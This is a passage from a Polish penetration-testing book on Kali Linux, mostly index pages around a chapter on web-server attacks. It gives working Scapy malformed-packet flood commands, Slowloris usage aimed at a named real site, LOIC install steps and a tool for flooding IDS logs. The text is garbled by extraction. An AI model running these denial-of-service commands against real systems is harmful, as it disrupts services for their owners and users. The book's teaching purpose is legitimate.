275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
